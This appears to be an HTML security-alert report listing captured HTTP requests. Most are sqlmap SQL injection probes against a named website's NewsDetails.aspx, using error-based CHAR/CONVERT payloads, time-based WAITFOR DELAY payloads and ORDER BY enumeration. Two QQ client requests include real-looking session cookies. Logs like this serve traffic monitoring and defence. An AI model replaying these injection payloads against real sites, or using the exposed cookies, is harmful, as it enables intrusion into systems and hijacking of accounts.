            </table></span></h2></span><div xmlns="" id="btag-外部引入/419-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-7928&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/444-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        444-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/444-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%209598%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289598%3D9598%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/409-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        409-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/409-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%204634%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284634%3D4634%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/478-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        478-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/478-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-2461%20OR%204842%3DCONCAT%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2C%28SELECT%20%28CASE%20WHEN%20%284842%3D4842%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/523-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        523-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/523-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/600-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        600-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/600-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/QQHDs/MacQQ/Release/resources/plist/business.plist&nbsp;HTTP/1.1<br/>Host:&nbsp;sqimg.qq.com<br/>Accept:&nbsp;*/*<br/>Cookie:&nbsp;pt2gguin=o0573780488;&nbsp;ptcz=976ee4b79fe9770db00ac623cf45a7bec906687f287abd87463ea0d74dd029d1;&nbsp;pgv_pvid=6985308685;&nbsp;RK=tbs/Ekfjbw<br/>User-Agent:&nbsp;QQ/22864&nbsp;CFNetwork/807.0.4&nbsp;Darwin/16.0.0&nbsp;(x86_64)<br/>Accept-Language:&nbsp;zh-cn<br/>Accept-Encoding:&nbsp;gzip,&nbsp;deflate<br/>Connection:&nbsp;keep-alive<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/594-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        594-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/594-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/QQHDs/MacQQ/Release/PropertyList_v1.1.plist&nbsp;HTTP/1.1<br/>Host:&nbsp;sqimg.qq.com<br/>Accept:&nbsp;*/*<br/>Cookie:&nbsp;pt2gguin=o0573780488;&nbsp;ptcz=976ee4b79fe9770db00ac623cf45a7bec906687f287abd87463ea0d74dd029d1;&nbsp;pgv_pvid=6985308685;&nbsp;RK=tbs/Ekfjbw<br/>User-Agent:&nbsp;QQ/22864&nbsp;CFNetwork/807.0.4&nbsp;Darwin/16.0.0&nbsp;(x86_64)<br/>Accept-Language:&nbsp;zh-cn<br/>Accept-Encoding:&nbsp;gzip,&nbsp;deflate<br/>Connection:&nbsp;keep-alive<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/512-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        512-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/512-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287633%3D7633%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/546-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        546-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/546-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/571-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        571-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/571-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/686-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        686-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/686-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%3BWAITFOR%20DELAY%20%270%3A0%3A0%27--&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/710-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        710-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/710-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1195-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1195-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1195-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20WAITFOR%20DELAY%20%270%3A0%3A5%27&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1307-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1307-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1307-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20WAITFOR%20DELAY%20%270%3A0%3A0%27&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1337-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1337-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1337-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20WAITFOR%20DELAY%20%270%3A0%3A5%27&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1489-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1489-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1489-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%206--%20QKSb&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1467-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1467-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1467-Other&lt;br&gt; " style="display: block;">


